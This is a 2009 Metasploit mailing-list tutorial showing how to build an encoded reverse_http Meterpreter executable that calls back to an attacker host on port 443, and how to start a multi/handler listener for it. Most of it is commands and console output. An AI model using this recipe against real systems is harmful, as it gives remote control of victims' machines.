Metasploit mailing list archives
Fwd: PassiveX Listener
From: mubix at room362.com (Rob Fuller)
Date: Wed, 10 Jun 2009 09:32:01 -0400
Damn you people and your strict RFC compliance... ;-)
--
Rob Fuller | Mubix | Room362.com | Hak5.org
---------- Forwarded message ----------
From: Rob Fuller <mubix at room362.com>
Date: Wed, Jun 10, 2009 at 9:11 AM
Subject: Re: [framework] PassiveX Listener
To: Jamie Penney <jamie.penney at gmail.com>
*Here are the options for msfpayload:*
Usage: ./msfpayload <payload> [var=val]
<S[ummary]|C|P[erl]|[Rub]y|R[aw]|J[avascript]|e[X]ecutable|[V]BA>
*And msfencode's options if you chose to use it as I demonstrate below.
However, encoding happens by default with msfpayload (IIRC):*
./msfencode -h
Usage: ./msfencode <options>
OPTIONS:
-a <opt> The architecture to encode as
-b <opt> The list of characters to avoid: '\x00\xff'
-c <opt> The number of times to encode the data
-e <opt> The encoder to use
-h Help banner
-i <opt> Encode the contents of the supplied file path
-l List available encoders
-m <opt> Specifies an additional module search path
-n Dump encoder information
-o <opt> The output file
-s <opt> The maximum size of the encoded data
-t <opt> The format to display the encoded buffer with (c, elf, exe,
java, perl, raw, ruby, vba)
*Here we create the PassiveX payload. Note the PX options instead of the
LHOST/LPORT:*
./msfpayload windows/reflectivemeterpreter/reverse_http PXHOST=192.168.1.100
PXPORT=443 PXURI=/ R | ./msfencode -t exe -o /tmp/maliciouspayload.exe
[*] x86/shikata_ga_nai succeeded with size 97 (iteration=1)
*Now that we have our "malicious payload" in /tmp we get our listener ready
(you can use msfcli as well, I just like msfconsole because it provides me
more flexibility):*
./msfconsole
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|
=[ msf v3.3-dev
+ -- --=[ 376 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 153 aux
msf > use multi/handler
msf exploit(handler) > exploit -h
*(I'm showing you 'exploit's options because a lot of people don't know they
exist. With two lines you can start your listener (use, then exploit):*
Usage: exploit [options]
Launches an exploitation attempt.
OPTIONS:
-e <opt> The payload encoder to use. If none is specified, ENCODER is
used.
-h Help banner.
-j Run in the context of a job.
-n <opt> The NOP generator to use. If none is specified, NOP is used.
-o <opt> A comma separated list of options in VAR=VAL format.
-p <opt> The payload to use. If none is specified, PAYLOAD is used.
-t <opt> The target index to use. If none is specified, TARGET is
used.
-z Do not interact with the session after successful
exploitation.
msf exploit(handler) > exploit -j -z -p
windows/reflectivemeterpreter/reverse_http -o
PXHOST=0.0.0.0,PXPORT=443,ExitOnSession=False
[*] Exploit running as background job.
msf exploit(handler) >
[*] PassiveX listener started.
[*] Starting the payload handler...
msf exploit(handler) >
*Listener ready to go. I chose IP: 0.0.0.0 just to make things easy. Just
send off maliciouspayload.exe to your target and you're set.*
Hope this helps,
--
Rob Fuller | Mubix | Room362.com | Hak5.org
On Wed, Jun 10, 2009 at 5:51 AM, Jamie Penney <jamie.penney at gmail.com>wrote:
Hi! Does anyone know off the top of their head how run the PassiveX listener without actually sending any exploit. For example, if I use msfpayload piped to msfencode to create an .exe file containing the PassiveX stage 1 code and run this manually I would need the listener to be running on the other end. _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
-------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090610/20b8c5df/attachment.htm>
Current thread:
- PassiveX Listener Jamie Penney (Jun 10)
- PassiveX Listener H D Moore (Jun 10)
- Message not available
- Fwd: PassiveX Listener Rob Fuller (Jun 10)